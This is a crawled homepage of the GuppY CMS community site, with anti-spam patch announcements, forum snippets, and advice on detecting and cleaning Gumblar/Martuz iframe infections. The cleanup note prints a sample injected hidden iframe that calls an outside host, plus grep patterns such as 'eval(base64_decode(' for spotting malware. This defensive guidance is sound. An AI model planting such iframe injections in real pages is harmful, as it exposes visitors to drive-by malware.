Search
The GuppY CMS
Technical bulletin
Don't forget
Preferences
 9999 members
Connected :
 linuxmr
Visits
11064289 visitors 28 visitors online
Infos site
Newsletter
Sample of RSS
Calendar
|
Welcome to GuppY CMS Portail WEB php gratuit sans BDD
GuppY, the easy web portal
- You would like to build a website to present your hobbies, introduce a software you like to use, share your photos, speak about you or communicate with other people ?
- You would like your site to be complete, interactive, having a guestbook, a forum and the possibility to easily add some mods as poll, gallery, directory, etc ?
- Alas, you don't have any knowledge of HTML, PHP, mySQL ?
An easy, free web portal, GuppY will allow you to generate very easily a complete and interactive web site. It requires no database.
- Learn about the great features of GuppY, by reading the detailed and illustrated presentation in GuppY CMS box.
- Download GuppY and its users manual
- Visit GuppY Land, where you can find many free resources to customize your GuppY (plugins, mods, forks, icons, smileys, arrows and counter sets, links... )
- GuppY is distributed uner de CeCILL license
Adopt GuppY and then devote yourself to the most important part of your site that will make its success : its content !
----------------========+========----------------
"A GuppY User, I am a member of the freeGuppY association; why not join us?
Papinou: treasurer of the association and skinner for GuppY
On June 2nd 2007, the 20 founding members created the freeGuppY association, adopted the statutes and elected the Board of Administrators. freeGuppY is a GuppY users' association who aim is to "ensure in the promotion and durability of the GuppY software and its values."
It is governed by the French 1901 law on non-profit making associations. It is authorized entitled to manage funds in the interest of its members and donators.
You enjoy GuppY and you wish to help us with your knowledge and skills, or just a small donation: you are welcome indeed! Joining this Association is participating in the development thanks to your financial help. It enables to help on occasions.
It also gives the opportunity to be noticed by the developers, which can lead to perhaps join the GuppY Team. Like the sixty-seven members of the association, please join us and get involved in this great adventure, according to your possibilities and availability.
The Association provides: - Technical resources - A dynamic team - Actions to help the GuppY Team - Congresses - Press Relations - Promotional offers - Contests - etc.
GuppY needs you! Join us!
Forum live
| GuppY [French] |
Topic : Problème lettre d'information + cryptograph |
| Bonsoir, ¬ ¬ Oui je peux me connecter sur ton site. ¬ Citation :j'ai supprimé ... |
18/06/2013 @ 22:30
 (by Papinou) |
| GuppY [French] |
Topic : Plus d'accès aux articles |
| Bonsoir Yves, ¬ ¬ Après avoir supprimé ces 29000 scories par Admin Livre d'Or et avant ... |
18/06/2013 @ 22:11
(by Icare_) |
| GuppY [French] |
Topic : Problème lettre d'information + cryptograph |
| Bonsoir,Je suis bien en PHP 5 (ajout de php 1)Merci, je crois avoir fais ce qu'il faut (j'ai ... |
18/06/2013 @ 21:54
(by brla78) |
| GuppY [French] |
Topic : Plus d'accès aux articles |
| Au passage, plein de fichiers ont été modifiés ... |
18/06/2013 @ 21:51
(by ProvenceYves) |
| GuppY [French] |
Topic : Plus d'accès aux articles |
| Bonsoir, ¬ Le site : http://lacistude.fr ¬ J'ai renommé le fichier docid.dtb et ... |
18/06/2013 @ 21:45
(by ProvenceYves) |
| GuppY [French] |
Topic : Intégrer un site existant à Guppy |
| reOk merci pour les infos. ¬ Je vais tenter de développer avec Guppy dorénavant et voir ces ... |
18/06/2013 @ 19:44
(by didpoy) |
| GuppY [French] |
Topic : Intégrer un site existant à Guppy |
| Salut, ¬ Citation :Un exemple en cours de réalisation: ¬ Réalisé ... |
18/06/2013 @ 18:42
(by Laroche) |
| GuppY [French] |
Topic : problème juridique de fond d'écran ! |
| Bonjour, ¬ ¬ Hors sujet : Il faudrait mettre à jour ton site en version 4.6.25 pour ... |
18/06/2013 @ 17:59
(by JeandePeyrat) |
| GuppY [French] |
Topic : problème juridique de fond d'écran ! |
| Bonjour, ¬ ¬ Tu peux nous envoyer une copie de ce courrier sur le mail que tu vas ... |
18/06/2013 @ 17:53
(by Papinou) |
| GuppY [French] |
Topic : problème juridique de fond d'écran ! |
| Salut, ¬ ¬ Quelque soit la suite à donner, surtout ne pas commencer par payer quoi que ... |
18/06/2013 @ 17:35
(by Laroche) |
The 3 last news
GuppY - Patch nc 4.6.25
- by GuppY_Team
11/06/2013 @ 17:24
GuppY patch_nc_4625
Carrying on with our fight against spam, we come uo with patch_nc_4625 that features:
- 1 - Renaming the file download.php on the same principle as the other files - thanks Saxbar.
- 2 - Correction of the Preview and Print display in blog.php - thanks Saxbar.
Before installing this patch 4.6.25, you should read the updated tutorial that is included as pdf document: "tuto_configure_ANTI-SPAM" and follow it to the letter.
As with each new version, do not forget to update your plugins, reinstall your forks, and revalidate your configuration pages.
Upgrade from the 4.6.24 version 4.6.25 version with this patch_nc_4625.
EXCEPTIONALLY, patch_nc_4624 will stay for downloading on freeGuppY ; we do remind you that it has to be urgently installed for the proper functioning and security of your site.
Thank you to all participants in this patch.
The Guppy Team
... / ... 
GuppY patch_nc_4625
Carrying on with our fight against spam, we come uo with patch_nc_4625 that features:
- 1 - Renaming the file download.php on the same principle as the other files - thanks Saxbar.
- 2 - Correction of the Preview and Print display in blog.php - thanks Saxbar.
Before installing this patch 4.6.25, you should read the updated tutorial that is included as pdf document: "tuto_configure_ANTI-SPAM" and follow it to the letter.
As with each new version, do not forget to update your plugins, reinstall your forks, and revalidate your configuration pages.
Upgrade from the 4.6.24 version 4.6.25 version with this patch_nc_4625.
EXCEPTIONALLY, patch_nc_4624 will stay for downloading on freeGuppY ; we do remind you that it has to be urgently installed for the proper functioning and security of your site.
Thank you to all participants in this patch.
The Guppy Team 
GuppY - Patch_nc_4.6.24 (2013.06.07)
- by GuppYTeam
07/06/2013 @ 17:55
GuppY - Patch_nc_4.6.24
We release this non-cumulative patch for 4.6.24 GuppY with several changes, all aimed at spam-fighting.
We recommend that you install this emergency security patch.
For two months up to now, we have been facing:
- 1 - Spam on the guestbook or news, blocked so far by Cryptographp
- 2 - Requests from spambots from postguest.php to the guestbook and news.
Here are some kind of calls for GuppY
http://monsite.fr/postguest.php?lng=en&typ=gb
http://monsite.fr/postguest.php?lng=en&typ=ne
http://monsite.fr/postguest.php?lng=fr&typ=gb
http://monsite.fr/postguest.php?lng=fr&typ=ne
Scripts robots do not indeed type randomly but keep trying on standard file names that are in open source CMS scripts - for GuppY is not the only target.
These queries lead to shared server overload and depending on which hosts, sites can be suspended, postguest blocked in chmod 200 or else renamed.
The 4.6.24 patch allows renaming of files and integrates Cryptographp to provide answers to both problems (Thanks Saxbar).
All changes to files are about renaming files, integrating Cryptographp with functional default configuration, except the files admin/inc/upload.inc (correction of a misprint line 219 and table display from line 220 to 225 – thanks Laroche) and admin/inc/nwllist.inc (adding a search in the list of newsletter subscribers – thanks Saxbar)
- Renaming files postguest.php, user.php and newsletter.php to a custom name for each site, is in our opinion, essential.
- Renaming guestbk.php also owing to the number of requests to the guestbook, even if it has an impact on the ranking of the guestbook.
- Renaming blogs.php, blog.php, forum.php, fortopic.php, thread.php, news.php can be at the discretion of the webmaster or according to calls on the website because the impact on SEO is much more important.
If users do rename their files unpredictably, there will be thousands or tens of thousands files with different names and even when robots scan the net, they will get millions of returns to their servers which is a fair payback for their attacks.
You'd better have your site a little less well-referenced rather than closed down by the hosters.
In fact they are looking for ways out of this problem because eventually the invasion of spam and requests will turn customers away.
Before installing the patch, you should read the pdf tutorial included in the patch: "Configure ANTI-SPAM" and follow it to the letter.
As with each new version, do not forget to update your plugins, reinstall your forks, and revalidate your configuration pages.
To upgrade from the 4.6.23.1 version to 4.6.24 version, you must use this patch_nc_4624.
Thank you to all participants in this patch.
The Guppy Team
... / ...
GuppY - Patch_nc_4.6.24
We release this non-cumulative patch for 4.6.24 GuppY with several changes, all aimed at spam-fighting.
We recommend that you install this emergency security patch.
For two months up to now, we have been facing:
- 1 - Spam on the guestbook or news, blocked so far by Cryptographp
- 2 - Requests from spambots from postguest.php to the guestbook and news.
Here are some kind of calls for GuppY
http://monsite.fr/postguest.php?lng=en&typ=gb
http://monsite.fr/postguest.php?lng=en&typ=ne
http://monsite.fr/postguest.php?lng=fr&typ=gb
http://monsite.fr/postguest.php?lng=fr&typ=ne
Scripts robots do not indeed type randomly but keep trying on standard file names that are in open source CMS scripts - for GuppY is not the only target.
These queries lead to shared server overload and depending on which hosts, sites can be suspended, postguest blocked in chmod 200 or else renamed.
The 4.6.24 patch allows renaming of files and integrates Cryptographp to provide answers to both problems (Thanks Saxbar).
All changes to files are about renaming files, integrating Cryptographp with functional default configuration, except the files admin/inc/upload.inc (correction of a misprint line 219 and table display from line 220 to 225 – thanks Laroche) and admin/inc/nwllist.inc (adding a search in the list of newsletter subscribers – thanks Saxbar)
- Renaming files postguest.php, user.php and newsletter.php to a custom name for each site, is in our opinion, essential.
- Renaming guestbk.php also owing to the number of requests to the guestbook, even if it has an impact on the ranking of the guestbook.
- Renaming blogs.php, blog.php, forum.php, fortopic.php, thread.php, news.php can be at the discretion of the webmaster or according to calls on the website because the impact on SEO is much more important.
If users do rename their files unpredictably, there will be thousands or tens of thousands files with different names and even when robots scan the net, they will get millions of returns to their servers which is a fair payback for their attacks.
You'd better have your site a little less well-referenced rather than closed down by the hosters.
In fact they are looking for ways out of this problem because eventually the invasion of spam and requests will turn customers away.
Before installing the patch, you should read the pdf tutorial included in the patch: "Configure ANTI-SPAM" and follow it to the letter.
As with each new version, do not forget to update your plugins, reinstall your forks, and revalidate your configuration pages.
To upgrade from the 4.6.23.1 version to 4.6.24 version, you must use this patch_nc_4624.
Thank you to all participants in this patch.
The Guppy Team
GuppY users warning
- by CA asso freeGuppY 17/04/2013 @ 18:32
GuppY users warning
Hello everyone,
We have come to know that GuppY users have been "approached" by mail or other means by individuals, associations or professionals who were not mandated by the GuppY Team or freeGuppY association.
Proposals have been made for their "help" to update, modify or create new sites using GuppY.
In some cases, non-professionals offered them to host on their server.
All this on a money-making purpose that can be thought inflationary!
It has to be kept in mind that when members of the GuppY Team freeGuppY association contribute directly, i.e. in GuppY users sites they have been given FTP and admin access, in these cases, transparency is full and no financial consideration is requested. Not even freeGuppY association membership!
Sometimes users who are pleased with our service, take membership to the freeGuppY association and/ormake a donation. We warmly thank those users who help the continued development of your favourite fish.
The accounts of the Freeguppy association can be accessed easily on the website http://asso.freeguppy.org.
These troubleshooting operations are conducted in two ways:
- Either we offer on freeguppy.org forum timely assistance to GuppY users who get stuck with their website.
- Or we receive on freeguppy.org a request for assistance through email or private message, and we decide if it can be met or not.
Regarding hosting, we recommend our partner Nuxit host that offers good service, engineers and skilled technicians and high quality infrastructure.
Shared professional hosting of this quality costs only a few euros per month. So it should not be overlooked..
Hosting is a professional activity that requires:
- Extensive knowledge of networking, Linux or another OS in some cases.
- Adequate infrastructure that does not suffer mediocrity.
For ten years amateur hosting has been tried by GuppY users and most experiments were to no avail. Those "hosters" went straight down and hosted fish drowned!
Everyone is of course free to seek help and shelter as they wish but to be forewarned is to be forearmed.
The Administrative Council of the association freeGuppY
... / ...
GuppY users warning
Hello everyone,
We have come to know that GuppY users have been "approached" by mail or other means by individuals, associations or professionals who were not mandated by the GuppY Team or freeGuppY association.
Proposals have been made for their "help" to update, modify or create new sites using GuppY.
In some cases, non-professionals offered them to host on their server.
All this on a money-making purpose that can be thought inflationary!
It has to be kept in mind that when members of the GuppY Team freeGuppY association contribute directly, i.e. in GuppY users sites they have been given FTP and admin access, in these cases, transparency is full and no financial consideration is requested. Not even freeGuppY association membership!
Sometimes users who are pleased with our service, take membership to the freeGuppY association and/ormake a donation. We warmly thank those users who help the continued development of your favourite fish.
The accounts of the Freeguppy association can be accessed easily on the website http://asso.freeguppy.org.
These troubleshooting operations are conducted in two ways:
- Either we offer on freeguppy.org forum timely assistance to GuppY users who get stuck with their website.
- Or we receive on freeguppy.org a request for assistance through email or private message, and we decide if it can be met or not.
Regarding hosting, we recommend our partner Nuxit host that offers good service, engineers and skilled technicians and high quality infrastructure.
Shared professional hosting of this quality costs only a few euros per month. So it should not be overlooked..
Hosting is a professional activity that requires:
- Extensive knowledge of networking, Linux or another OS in some cases.
- Adequate infrastructure that does not suffer mediocrity.
For ten years amateur hosting has been tried by GuppY users and most experiments were to no avail. Those "hosters" went straight down and hosted fish drowned!
Everyone is of course free to seek help and shelter as they wish but to be forewarned is to be forearmed.
The Administrative Council of the association freeGuppY
The 4 last notes
Commissioning of the automatic creation of twitter son from the Bloggy http://www.freeguppy.org - by
JeandePeyrat
Commissioning of the automatic creation of twitter son from the Bloggy http://www.freeguppy.org
... / ...
Commissioning of the automatic creation of twitter son from the Bloggy http://www.freeguppy.org
What to do after an attack on Iframe by Gumblar, Martuz, Troj / JSRedir-R ... ? - by
GuppYTeam
Following repeated requests on the forum and although GuppY has nothing to do with safety issues related to this worm / Trojan that is known by different names and can attack any site regardless of its programming we give you below some information to fight these nuisances:
* Gumblar, Martuz, Troj / JSRedir-R and others spread over the Internet via infected websites by taking advantage of vulnerabilities in softwares that are not updated by the administrators, webmasters, moderators or editors of sites that have access by FTP.
* Some vulnerabilities have been identified including the Adobe software (Adobe Acrobat Reader, Adobe Flash Player, ...) not updated but it is not excluded that other software not updated may have potential flaws.
* If the Trojan has managed to settle on an administrator's PC, (or a webmaster's, moderator's or editor's) of a site because they have no effective and updated antivirus, it retrieves the FTP access codes of the site and then, of course, any misdeed is possible.
* The site will in turn be polluted by the pirates and will then pollute many others.
How do you realize that the site has been infected?
* If your anti-virus or your anti-spyware displays an alert of iframe attack.
* If Google or another search engine warns you that your site is dangerous.
* If your host blocks the site for that reason.
* If your browser redirects you to a suspicious site or ask if you accept this redirection.
* If you find that new files and / or directories have been installed without your knowledge on your FTP or files weights have changed.
* ...
What's going on with the infected site ?
* Files are altered by iframe commands like this:
"<. Iframe src =" http://site_pollueur.cn:8080/index.php "width = 100 height = 150 style =" visibility: hidden "> </ iframe.> "
This is possible because iframes are often invisible on the site (visibility: hidden)
* In some cases? hackers will install scripts that are more or less powerful, but able still to launch attacks from your site to other sites or even to your server.
* In other cases, part of the code is encoded in Base64 which gives strings like this one:
Qm9uam91cg == which equals Hello 
aWZyYW1l which equals iframe
* The most commonly infected files are index files with any extension (html, htm, php ,...), but any files and even images or false image files can be!
What to do in case of infection?
* You must first scan your PC with an effective updated antivirus and/or antispyware. Note that the first antivirus or one of the first to detect and block these attacks is Avast even in its free version. It has then even been laughed at and was charged with generating "false positives".
* Update Windows or whatever OS you have if it is not yet done.
* Update your software (Adobe software in particular).
* Ask all prospective administrators, moderators or editors of your sites to do the same.
As regards disinfection of the site (or sites) themselves if it runs under a Windows PC with a shared hosting:
* Retrieve the local site via FTP and run the antivirus software.
* Search for files that appear to be heavier or to have different weights.
* Search all files for suspicious strings such as iframe, hidden, ... Notepad + +, among others, can do that and compare files with the same name (one original GuppY file from the pack together with a backup file from the polluted site).
* Replace or repair the infected files and remove redundant files.
* Run the antivirus again.
* Change the FTP code -at least the password- if possible from another PC that has not been infected.
* upload again the disinfected files and folders on the server.
* Test the site on line after emptying the cache or the browsers.
If you have access to Linux / Unix console via SSH (in the case of a dedicated server, or a semi-dedicated, virtual, private server (VPS)) or if your website is hosted at home under Linux or Unix:
* You can search on all or part of the server or sites hosted on it, using grep and find commands on the keywords listed above or others such as eval (base64_decode( (but in this case Linux/Unix regulars will manage.
Wise tips:
* Update software and ask the other site administrators to do the same.
* Update antivirus and anti spyxwares and ask the other site administrators to do the same.
* Do not save FTP passwords in particular and enter them each time.
* Chmod as many files as possible in 444 (read only) and in particular the index files and even .Htaccess files.
It is important not to chmod this way those files that have to be in read/write mode as data files and others that could not then be edited or incremented.
Another drawback of chmoding into read-only is that they will have to be put back into reading/writing 644-666) to add a patch or do a migration; but is the price to pay for some extra security.
* There are also apps that are capable of eradicating these Trojans but they are usually charged ones.
We have gleaned these explanations here and there ; they are the fruit of our personal experiences and can't by no means be exhaustive, zll the more than malware are constantly changing.
For more information, you need to type one of the keywords below or more of them in Google or your favorite search engine:
Iframe Gumblar Martuz Troj / JSRedir-R
Good luck in case of infections!
JeandePeyrat for GuppY Team.
... / ...
Following repeated requests on the forum and although GuppY has nothing to do with safety issues related to this worm / Trojan that is known by different names and can attack any site regardless of its programming we give you below some information to fight these nuisances:
* Gumblar, Martuz, Troj / JSRedir-R and others spread over the Internet via infected websites by taking advantage of vulnerabilities in softwares that are not updated by the administrators, webmasters, moderators or editors of sites that have access by FTP.
* Some vulnerabilities have been identified including the Adobe software (Adobe Acrobat Reader, Adobe Flash Player, ...) not updated but it is not excluded that other software not updated may have potential flaws.
* If the Trojan has managed to settle on an administrator's PC, (or a webmaster's, moderator's or editor's) of a site because they have no effective and updated antivirus, it retrieves the FTP access codes of the site and then, of course, any misdeed is possible.
* The site will in turn be polluted by the pirates and will then pollute many others.
How do you realize that the site has been infected?
* If your anti-virus or your anti-spyware displays an alert of iframe attack.
* If Google or another search engine warns you that your site is dangerous.
* If your host blocks the site for that reason.
* If your browser redirects you to a suspicious site or ask if you accept this redirection.
* If you find that new files and / or directories have been installed without your knowledge on your FTP or files weights have changed.
* ...
What's going on with the infected site ?
* Files are altered by iframe commands like this:
"<. Iframe src =" http://site_pollueur.cn:8080/index.php "width = 100 height = 150 style =" visibility: hidden "> </ iframe.> "
This is possible because iframes are often invisible on the site (visibility: hidden)
* In some cases? hackers will install scripts that are more or less powerful, but able still to launch attacks from your site to other sites or even to your server.
* In other cases, part of the code is encoded in Base64 which gives strings like this one:
Qm9uam91cg == which equals Hello
aWZyYW1l which equals iframe
* The most commonly infected files are index files with any extension (html, htm, php ,...), but any files and even images or false image files can be!
What to do in case of infection?
* You must first scan your PC with an effective updated antivirus and/or antispyware. Note that the first antivirus or one of the first to detect and block these attacks is Avast even in its free version. It has then even been laughed at and was charged with generating "false positives".
* Update Windows or whatever OS you have if it is not yet done.
* Update your software (Adobe software in particular).
* Ask all prospective administrators, moderators or editors of your sites to do the same.
As regards disinfection of the site (or sites) themselves if it runs under a Windows PC with a shared hosting:
* Retrieve the local site via FTP and run the antivirus software.
* Search for files that appear to be heavier or to have different weights.
* Search all files for suspicious strings such as iframe, hidden, ... Notepad + +, among others, can do that and compare files with the same name (one original GuppY file from the pack together with a backup file from the polluted site).
* Replace or repair the infected files and remove redundant files.
* Run the antivirus again.
* Change the FTP code -at least the password- if possible from another PC that has not been infected.
* upload again the disinfected files and folders on the server.
* Test the site on line after emptying the cache or the browsers.
If you have access to Linux / Unix console via SSH (in the case of a dedicated server, or a semi-dedicated, virtual, private server (VPS)) or if your website is hosted at home under Linux or Unix:
* You can search on all or part of the server or sites hosted on it, using grep and find commands on the keywords listed above or others such as eval (base64_decode( (but in this case Linux/Unix regulars will manage.
Wise tips:
* Update software and ask the other site administrators to do the same.
* Update antivirus and anti spyxwares and ask the other site administrators to do the same.
* Do not save FTP passwords in particular and enter them each time.
* Chmod as many files as possible in 444 (read only) and in particular the index files and even .Htaccess files.
It is important not to chmod this way those files that have to be in read/write mode as data files and others that could not then be edited or incremented.
Another drawback of chmoding into read-only is that they will have to be put back into reading/writing 644-666) to add a patch or do a migration; but is the price to pay for some extra security.
* There are also apps that are capable of eradicating these Trojans but they are usually charged ones.
We have gleaned these explanations here and there ; they are the fruit of our personal experiences and can't by no means be exhaustive, zll the more than malware are constantly changing.
For more information, you need to type one of the keywords below or more of them in Google or your favorite search engine:
Iframe Gumblar Martuz Troj / JSRedir-R
Good luck in case of infections!
JeandePeyrat for GuppY Team.
Admin zones to check - by
GuppY Team
Hello,
from time to time, check your admin / Recommend , you could find spam in it 
in case of spamming, you can install plugin/fork cryptograph from Hpsam ( GuppYteam member )
Another section to check is admin / Maintenance witch keep all the datas you've deleted before.
Hello,
from time to time, check your admin / Recommend , you could find spam in it
in case of spamming, you can install plugin/fork cryptograph from Hpsam ( GuppYteam member )
Another section to check is admin / Maintenance witch keep all the datas you've deleted before.
Clean your website after an infection - by
GuppYteam
To know if one were infected:
make an inventory of the various folders of your website, by ftp, by classifying your files by date in the distant repertory. (according to software ftp that you use)
it may be that you find there files gone back to these last days with names “odd” (d.php, cmdwork.txt,…) or even of the index.html files or of the .jpg files which are not images and which do not have anything to do there! , remove them .
the technique which consists in downloading its website and to pass it to the antivirus, can also bear its fruits, you can find Trojans
... / ...
To know if one were infected:
make an inventory of the various folders of your website, by ftp, by classifying your files by date in the distant repertory. (according to software ftp that you use)
it may be that you find there files gone back to these last days with names “odd” (d.php, cmdwork.txt,…) or even of the index.html files or of the .jpg files which are not images and which do not have anything to do there! , remove them .
the technique which consists in downloading its website and to pass it to the antivirus, can also bear its fruits, you can find Trojans
|
Plugins
Translations
Top 
© 2004-2012 
